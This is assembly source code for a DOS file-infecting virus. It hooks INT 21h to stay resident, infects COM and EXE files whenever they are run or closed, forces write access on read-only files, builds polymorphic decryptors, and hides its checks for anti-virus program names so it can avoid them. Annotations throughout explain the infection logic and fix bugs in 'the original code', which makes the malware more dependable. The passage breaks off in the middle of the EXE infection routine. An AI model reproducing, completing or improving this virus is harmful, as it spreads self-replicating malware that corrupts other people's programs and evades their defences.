Rand5b db ? ; one-byte slot; what fills it is set up above this chunk (not visible here)
; Three 4-byte code fragments. Each is "CS: <byte op> [SI]" padded with a NOP, so they
; are interchangeable in size; they differ only in the ModRM /digit (FE /0 = inc,
; FE /1 = dec, F6 /3 = neg). Presumably one is picked at random by the decryptor
; generator -- the selecting code is outside this chunk.
db 02eh,0feh,004h,090h ; inc byte ptr cs:[si]; nop
db 02eh,0feh,00ch,090h ; dec byte ptr cs:[si]; nop
db 02eh,0f6h,01ch,090h ; neg byte ptr cs:[si]; nop
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Following table contains four different ways to increase :+
;+ SI. Used only in the DECode-routine (CCode1). :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
; Four 4-byte fragments that each leave SI = SI + 1. They are NOT otherwise
; equivalent: entry 2 zeroes BX, entries 2 and 3 force CF (clc/stc), so whatever
; decoder picks one of these must not keep anything live in BX or CF across it.
DEcSI db 083h,0c6h,001h,090h ; add si,1; nop
db 046h,033h,0dbh,0f8h ; inc si; xor bx,bx; clc
db 04eh,046h,046h,0f9h ; dec si; inc si; inc si; stc
db 083h,0c6h,002h,04eh ; add si,2; dec si
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Other data :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
CLength db ? ; Length of the decryptor (filled in elsewhere, not in this chunk)
db ? ; presumably the high byte of a 16-bit CLength -- verify against the writer
ComExe db 0 ; Type of the file being infected: 0=COM, 1=EXE
buffer db 0c3h ; Scratch for the host's original first 3 bytes. Infect_Com reads 3 bytes
orgep dw 0 ; at "buffer", so byte 0 lands here and bytes 1-2 in orgep; the two must
; stay adjacent. The initial 0C3h is RET (the old comment's "03ch" was a
; typo): if this stub is ever run before a host was stored, the COM
; program just returns to its PSP and exits under normal DOS.
buffer2 db 0e9h ; JMP rel16 opcode. buffer2+entry_p is the 3-byte jump that
entry_p dw 0 ; Infect_Com writes over the host's start (rel16 = old EOF - 3)
Real_CS dw 0 ; Host CS:IP and SS:SP exactly as read from the EXE header by
Real_IP dw 0 ; Infect_Exe (raw header values, no load-segment relocation here)
Real_SS dw 0
Real_SP dw 0
IPOffs dw 100h ; Offset the host code starts at (100h for COM; Infect_Com stores it explicitly)
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ INT 21h Entrypoint. Check if virus is calling, and if file :+
;+ should be infected. :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
NewVect:
; INT 21h hook entry. Two jobs: answer the "are you there?" probe (AX=0DCBAh -> DX=0DCBAh)
; and route EXEC (AX=4B00h) and close (AH=3Eh) to the infection paths. Everything else
; falls through to the original handler via DoOldInt.
        cmp     ax,0DCBAh               ; residency probe from a fresh copy of the virus?
        je      short AlreadyHere
Notvirus:
        cli                             ; not re-enabled here; presumably the old handler's IRET restores IF
        cld
        cmp     ax,4b00h                ; EXEC: open/close the file first so it gets infected
        je      short FileExecute
        cmp     ah,3eh                  ; close handle: the actual infection point
        je      short FileClose
        jmp     DoOldInt                ; anything else: original INT 21h
AlreadyHere:
        mov     dx,ax                   ; reply DX = 0DCBAh; IRET restores the caller's flags
        iret
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Following code is called when a file is going to be executed. :+
;+ The file will be opened, and then closed. When the file is :+
;+ closed, the virus will call itself by INT21/3Eh, and the file :+
;+ will be infected. Pretty smart, eh? :) :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
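FileExecute:
; AX=4B00h path. DS:DX still holds the path from the caller's EXEC request, so the
; file is opened read-only and closed again; the close re-enters NewVect with AH=3Eh
; and FileClose does the infection. Registers are saved with PUSHA (flags are not).
        pusha
        mov     ax,3d00h                ; open read-only, DS:DX = path of the EXEC call
        int     21h
        jc      short ExecDone          ; open failed: AX is a DOS error code, not a handle.
                                        ; The original code closed "handle AX" anyway; for the
                                        ; usual codes 2-5 that is the caller's stderr/aux/prn
                                        ; or its first open file.
        mov     bx,ax                   ; BX = handle
        mov     ah,3eh
        int     21h                     ; close -> NewVect -> FileClose -> infect
ExecDone:
        popa
        jmp     DoOldInt                ; now run the real EXEC on the (possibly infected) file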
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Following code is called when a file is going to be closed. :+
;+ The code uses INT2F/1220h to get the address of the JFT entry, :+
;+ and then INT2F/1216h to get the address of the SFT entry. :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
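FileClose:
; AH=3Eh path, BX = handle being closed. Resolves the handle to its SFT entry through
; the DOS-internal INT 2Fh calls, inspects the 8.3 name stored there (offset 20h) and
; the extension (offset 28h), and calls Infect_Com / Infect_Exe. Both INT 2Fh calls
; report failure with CF=1 and then leave ES:DI untouched -- the original code did
; not check that and would have read (and, on a COM/EXE match, written) through
; whatever the caller had in ES:DI.
        cmp     bx,5                    ; handles 0-4 are the standard devices: never a victim
        jb      DoOldInt
        push    ds
        push    es
        pusha
        push    bx                      ; the handle; restored at SftDone
        mov     ax,1220h                ; DOS internal: ES:DI -> JFT entry of handle BX
        int     2fh
        jc      short SftDone           ; CF=1: BX is not an open handle of this PSP
        mov     bl,byte ptr es:[di]     ; SFT index behind that handle (BH assumed 0: DOS
                                        ; handle numbers are < 256, as the original relied on)
        cmp     bl,0ffh                 ; FFh marks an unused JFT slot
        stc                             ; preset "failed" (STC does not disturb ZF)
        je      short SftDone
        clc
        mov     ax,1216h                ; DOS internal: ES:DI -> SFT entry number BX
        int     2fh                     ; CF=1: index beyond FILES=
SftDone:
        pop     bx                      ; POP leaves the flags alone
        jc      short Skip_Infect       ; any failure: ES:DI is not an SFT entry, do not touch it
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ First two characters of the name are compared in swapped, offset form :+
;+ so the anti-virus product names below do not appear as plain ASCII  :+
;+ in the virus image. Crude, but deliberate.                          :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
        mov     ax,word ptr es:[di+20h] ; SFT+20h: 8.3 name, first two characters
        xchg    al,ah                   ; AL/AH swapped so AX matches an 'XY' literal
        add     ax,0302h                ; same offset as the constants below
        cmp     ax,'F-' + 0302h         ; Don't infect F-PROT
        je      short Skip_Infect
        cmp     ax,'SC' + 0302h         ; Don't infect SCAN
        je      short Skip_Infect
        cmp     ax,'TB' + 0302h         ; Don't infect TB*.* (TBAV)
        je      short Skip_Infect
        cmp     ax,'TO' + 0302h         ; Don't infect TOOLKIT
        je      short Skip_Infect
        cmp     ax,'FV' + 0302h         ; Don't infect FV386
        je      short Skip_Infect
        cmp     ax,'FI' + 0302h         ; Don't infect FINDVIRU
        je      short Skip_Infect
        cmp     ax,'VI' + 0302h         ; Don't infect VI*.*
        je      short Skip_Infect
        cmp     ax,'K-' + 0302h         ; Don't infect R.L's stuff :)
        je      short Skip_Infect
Check_Com:
        cmp     word ptr es:[di+28h],'OC' ; SFT+28h: extension "COM"?
        jne     short Check_Exe
        cmp     byte ptr es:[di+2ah],'M'
        jne     short Check_Exe
        or      byte ptr es:[di+2],2    ; SFT+02h open mode: force read/write on a read-only handle
        call    Infect_Com              ; BX = handle
        jmp     short Skip_Infect       ; was a fall-through; it relied on ES:DI surviving Infect_Com
Check_Exe:
        cmp     word ptr es:[di+28h],'XE' ; extension "EXE"?
        jne     short Skip_Infect
        cmp     byte ptr es:[di+2ah],'E'
        jne     short Skip_Infect
        or      byte ptr es:[di+2],2    ; force read/write, as above
        call    Infect_Exe
Skip_Infect:
        popa
        pop     es
        pop     ds
        jmp     DoOldInt                ; let DOS perform the real close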
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Infect COM-file :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
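Infect_Com:
; Append the virus to a COM file and patch its first 3 bytes into "JMP old_EOF".
; In: BX = handle (opened by FileExecute, now read/write via the SFT); caller saved DS.
; Uses buffer/orgep (host's original 3 bytes) and buffer2/entry_p (the new jump).
; DontInfect at the end is a shared exit also used by Infect_Exe.
        push    cs
        pop     ds                      ; DS = virus segment
        mov     ax,4202h                ; seek to EOF -> DX:AX = file length
        xor     cx,cx
        cwd                             ; DX = 0 (AX = 4202h < 8000h), cheaper than mov dx,0
        int     21h
        or      dx,dx
        jnz     short DontInfect        ; >= 64K is not a loadable COM image, and the
                                        ; 16-bit jump arithmetic below would wrap
        push    ax                      ; keep the length
        mov     ax,4200h                ; seek to SOF
        xor     cx,cx
        cwd
        int     21h
        mov     ah,3fh                  ; read the first 3 bytes into buffer+orgep
        mov     cx,3
        mov     dx,offset buffer
        int     21h                     ; AX = bytes read, CF=1 on error
        pop     cx                      ; CX = length (POP does not touch CF/ZF)
        jc      short DontInfect
        cmp     ax,3
        jne     short DontInfect        ; shorter than 3 bytes: orgep would be stale garbage
        xchg    ax,cx                   ; AX = file length
        cmp     word ptr ds:[buffer],'ZM' ; "MZ"/"ZM" at offset 0: an EXE image with a .COM
        je      short DontInfect        ; name; patching it as COM would corrupt the header
        cmp     word ptr ds:[buffer],'MZ'
        je      short DontInfect
        sub     ax,[orgep]              ; length minus the host's jmp displacement; if the host
                                        ; already starts with our jump this lands inside the
        cmp     ax,filecodelength+100h  ; virus body window -> treat as infected
        jnb     short LooksOk
        cmp     ax,filecodelength-10h
        jb      short LooksOk
        jmp     short DontInfect
LooksOk:
        mov     ax,4202h                ; back to EOF, AX = length again
        xor     cx,cx
        cwd
        int     21h
        cmp     ax,62000                ; leave room for virus + PSP in the 64K segment
        jnb     short DontInfect
        sub     ax,3                    ; rel16 is relative to the end of the 3-byte JMP at 100h
        mov     word ptr ds:[buffer2+1],ax ; entry_p: 103h + (len-3) = 100h + len = old EOF
        mov     [IPOffs],100h           ; COM hosts start at CS:100h
        push    bx
        call    WriteVirus              ; append the body at EOF (handle in BX)
        pop     bx
        mov     ax,4200h                ; SOF: overwrite the host's first 3 bytes with the jump
        xor     cx,cx
        cwd
        int     21h
        mov     ah,40h
        mov     cx,3
        mov     dx,offset buffer2
        int     21h
DontInfect:
        ret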
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Infect EXE-file :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
Infect_Exe:
push cs
pop ds
mov [File_H],bx
mov ax,4200h ; Go to SOF
xor cx,cx
cwd
int 21h
mov ah,3fh
mov cx,19h ; Size of EXE-header
mov dx,offset EXE_Header
int 21h
cmp word ptr ds:[EXE_Sig],'MZ' ; Be sure it's a real EXE.
je short ItIsAnExe
cmp word ptr ds:[EXE_Sig],'ZM'
je short ItIsAnExe
jmp short DontInfect
ItIsAnExe:
cmp byte ptr ds:[EXE_Win],40h ; Is it a NE-EXE?
je short DontInfect ; Don't infect.
xor eax,eax
xor ebx,ebx
xor ecx,ecx
les ax,dword ptr ds:[EXE_IP] ; get CS:IP in ES:AX
mov ds:Real_CS,es
mov ds:Real_IP,ax
push ax ; Save IP
push es ; Save CS
les ax,dword ptr ds:[EXE_SS] ; get SS:SP in AX:ES
mov ds:Real_SS,ax
mov ds:Real_SP,es
push es
pop bx ; SP in BX
shl eax,4 ; Build real SS:SP in EBX
add eax,ebx
pop cx ; Get CS in CX
pop bx ; Get IP in BX
shl ecx,4 ; Build real CS:IP in ECX
add ecx,ebx
sub eax,ecx ; EAX = SS:SP-CS:IP
cmp eax,(filecodelength+400)
jnb short NotInfected
cmp eax,filecodelength
jb short NotInfected
jmp SkipInfect
NotInfected:
xor eax,eax
mov bx,[File_H]
mov ax,4202h ; Go to EOF
xor cx,cx
cwd
int 21h ; Get filelength in dx:ax
xor ecx,ecx
xor ebx,ebx
mov cx, word ptr ds:[EXE_Siz] ; Get Siz/512 from header
mov bx, word ptr ds:[EXE_Mod] ; Get Siz mod 512 from header
shl ecx,9 ; Mul 512
add ecx,ebx ; Build Real memsize
mov bx,dx
shl ebx,16
add ebx,eax ; Build filesize in EBX
cmp ecx,ebx ; Is whole file loaded?
jb SkipInfect ; Nope, skip infect
xor ecx,ecx
push ax
pop cx ; Low word in cx